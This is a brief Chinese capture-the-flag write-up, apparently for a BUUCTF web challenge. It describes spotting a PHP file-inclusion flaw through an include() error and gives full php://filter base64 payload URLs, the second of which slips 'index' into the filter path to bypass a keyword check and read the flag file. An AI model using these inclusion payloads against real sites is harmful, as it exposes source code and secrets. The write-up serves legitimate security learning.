随便点一下

猜测sql注入,报错显示include()，是文件包含

http://d5fd4aa8-7ea1-4fc3-ae53-d3f1ea84d5d0.node3.buuoj.cn/index.php?category=php://filter/read=convert.base64-encode/resource=index
读取index

文件必须包含woofers或者meowers或者index，直接在伪协议上在加一层协议，读取flag
http://d5fd4aa8-7ea1-4fc3-ae53-d3f1ea84d5d0.node3.buuoj.cn/index.php?category=php://filter/read=convert.base64-encode/index/resource=flag